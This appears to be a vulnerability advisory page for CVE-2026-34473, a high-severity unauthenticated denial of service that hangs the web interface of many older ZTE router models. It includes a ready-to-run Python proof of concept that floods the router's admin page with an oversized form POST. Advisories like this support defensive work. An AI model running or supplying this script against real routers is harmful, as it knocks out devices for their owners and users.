Security Vulnerability Report
CVE-2026-34473 CVSS 7.5 HIGH

Published: 2026-05-06 19:16:36
Last Modified: 2026-05-07 15:15:07

Description

Unauthenticated DoS in ZTE H8102E, H168N, H167A, H199A, H288A, H198A, H267A, H267N, H268A, H388X, H196A, H369A, H268N, H208N, H367N, H181A, and H196Q. A denial-of-service condition can be triggered against the router's web interface by sending an oversized application/x-www-form-urlencoded POST body. After triggering, the management interface may become unresponsive until the device is rebooted. This may affect any firmware version prior to 2022 (reporter observation). The supplier stated that devices are not vulnerable since 2021-03-23; operator firmware may vary.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

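ZTE H8102E (firmware prior to 2022)
ZTE H168N (firmware prior to 2022)
ZTE H167A (firmware prior to 2022)
ZTE H199A (firmware prior to 2022)
ZTE H288A (firmware prior to 2022)
ZTE H198A (firmware prior to 2022)
ZTE H267A (firmware prior to 2022)
ZTE H267N (firmware prior to 2022)
ZTE H268A (firmware prior to 2022)
ZTE H388X (firmware prior to 2022)
ZTE H196A (firmware prior to 2022)
ZTE H369A (firmware prior to 2022)
ZTE H268N (firmware prior to 2022)
ZTE H208N (firmware prior to 2022)
ZTE H367N (firmware prior to 2022)
ZTE H181A (firmware prior to 2022)
ZTE H196Q (firmware prior to 2022)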

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL of the ZTE router web interface
target_url = "http://192.168.1.1/"

# Create a large payload to trigger the DoS
# Sending an oversized application/x-www-form-urlencoded body
large_payload = {"data": "A" * 100000}

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0"
}

try:
    print(f"Sending payload to {target_url}...")
    response = requests.post(target_url, data=large_payload, headers=headers, timeout=10)
    print(f"Response status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

print("DoS trigger attempt completed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34473", "sourceIdentifier": "[email protected]", "published": "2026-05-06T19:16:36.413", "lastModified": "2026-05-07T15:15:06.770", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unauthenticated DoS in ZTE H8102E, H168N, H167A, H199A, H288A, H198A, H267A, H267N, H268A, H388X, H196A, H369A, H268N, H208N, H367N, H181A, and H196Q. A denial-of-service condition can be triggered against the router's web interface by sending an oversized application/x-www-form-urlencoded POST body. After triggering, the management interface may become unresponsive until the device is rebooted. This may affect any firmware version prior to 2022 (reporter observation). The supplier stated that devices are not vulnerable since 2021-03-23; operator firmware may vary."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://gist.github.com/minanagehsalalma/7a8516b9b00d0008f2f25750320560c9", "source": "[email protected]"}, {"url": "https://www.zte.com.cn/global/", "source": "[email protected]"}]}}